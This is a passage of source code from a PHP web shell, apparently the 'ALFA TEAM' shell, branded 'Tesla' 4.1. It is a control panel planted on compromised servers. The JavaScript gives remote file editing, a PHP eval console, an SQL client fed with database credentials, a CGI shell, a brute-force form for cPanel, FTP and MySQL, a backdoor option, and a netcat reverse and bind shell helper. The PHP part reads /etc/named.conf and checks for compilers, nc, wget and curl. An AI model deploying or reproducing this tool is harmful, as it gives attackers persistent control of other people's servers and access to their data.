a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"&current_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in u=atob(u),editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+s+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+s+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+s+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+s+"')"),$(d).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",btoa(JSON.stringify(editor_files)),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php 
            echo "__ALFA_SECRET_KEY__";
            ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
</script>
<?php 
            echo "<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>\r\n<input type='hidden' name='a' value='dlfile'>\r\n<input type='hidden' name='c' value=''>\r\n<input type='hidden' name='file' value=''>\r\n</form>\r\n<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>\r\n<div id='a_loader'><img src='" . __showicon('loader') . "'></div>";
            $cmd_uname = alfaEx("uname -a", false, false);
            $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');
            if ($uname == "( php_uname ) Function Disabled !") {
                $GLOBALS["need_to_update_header"] = "true";
            }
            echo '
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div id="up_bar_holder"></div>
<div class="whole">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c" value="' . $GLOBALS['cwd'] . '">';
            for ($s = 1; $s <= 10; $s++) {
                echo '<input type="hidden" name="alfa' . $s . '">';
            }
            echo "<input type=\"hidden\" name=\"charset\">\r\n</form>\r\n<div id='hidden_sh'><a class=\"alert_green\" target=\"_blank\" href=\"?solevisible\"><span style=\"color:#42ff59;\">Tesla</span><br><small>Version: <span class=\"hidden_shell_version\">4.1</span></small></a></div>\r\n<div class=\"header\"><table width=\"100%\" border=\"0\">\r\n<tr>\r\n<td width=\"3%\"><span class=\"header_vars\">Uname:</span></td>\r\n<td colspan=\"2\"><span class=\"header_values\" id=\"header_uname\">" . $uname . '</span></td>
</tr>
<tr>
<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">' . $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>
</tr>
<tr>
<td><span class="header_vars">PHP:</span></td>
<td><b>' . @phpversion() . ' </b><span class="header_vars"> Safe Mode: ' . $safe_modes . '</span></td>
</tr>
<tr>
<td><span class="header_vars">ServerIP:</span></td>
<td><b>' . (!@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????' : @$_SERVER["SERVER_ADDR"]) . '</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> ' . @$_SERVER["REMOTE_ADDR"] . '</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
</tr>
<tr>
<td width="3%"><span class="header_vars">DateTime:</span></td>
<td colspan="2"><b>' . date('Y-m-d H:i:s') . '</b></td>
</tr>
<tr>
<td><span class="header_vars">Domains:</span></td>
<td width="76%"><span class="header_values" id="header_domains">';
            if ($GLOBALS['sys'] == 'unix') {
                $d0mains = _alfa_file("/etc/named.conf", false);
                if (!$d0mains) {
                    echo "Cant Read [ /etc/named.conf ]";
                    $GLOBALS["need_to_update_header"] = "true";
                } else {
                    $count = 0;
                    foreach ($d0mains as $d0main) {
                        if (@strstr($d0main, "zone")) {
                            preg_match_all('#zone "(.*)"#', $d0main, $domains);
                            flush();
                            if (strlen(trim($domains[1][0])) > 2) {
                                flush();
                                $count++;
                            }
                        }
                    }
                    echo "{$count} Domains";
                }
            } else {
                echo "Cant Read [ /etc/named.conf ]";
            }
            echo '</span></td>
</tr>
<tr>
<td height="16"><span class="header_vars">HDD:</span></td>
<td><span class="header_vars">Total:</span><b>' . alfaSize($totalSpace) . ' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' [' . (int) ($freeSpace / $totalSpace * 100) . '%]</b></td>
</tr>';
            if ($GLOBALS['sys'] == 'unix') {
                $useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
                if (!@ini_get('safe_mode')) {
                    if (strlen(alfaEx("id", false, false)) > 0) {
                        echo "<tr><td height=\"18\" colspan=\"2\"><span class=\"header_vars\">Useful : </span>";
                        $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzialfa2', 'nc', 'locate', 'suidperl');
                        $x = 0;
                        foreach ($userful as $item) {
                            if (alfaWhich($item)) {
                                $x++;
                                echo '<span class="header_values" style="margin-left: 4px;">' . $item . '</span>';
                            }
                        }
                        if ($x == 0) {
                            echo "<span class='header_values' id='header_useful'>--------------</span>";
                            $GLOBALS["need_to_update_header"] = "true";
                        }
                        echo "</td>\r\n</tr>\r\n<tr>\r\n<td height=\"0\" colspan=\"2\"><span class=\"header_vars\">Downloader: </span>";
                        $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
                        $x = 0;
                        foreach ($downloaders as $item2) {
                            if (alfaWhich($item2)) {
                                $x++;
                                echo '<span class="header_values" style="margin-left: 4px;">' . $item2 . '</span>';
                            }
                        }
                        if ($x == 0) {
                            echo "<span class='header_values' id='header_downloader'>--------------</span>";
                            $GLOBALS["need_to_update_header"] = "true";
                        }
                        echo "</td>\r\n</tr>";
                    } else {
                        echo $useful_downloader;
                        $GLOBALS["need_to_update_header"] = "true";
                    }
                } else {
                    echo $useful_downloader;
                    $GLOBALS["need_to_update_header"] = "true";
                }
            } else {
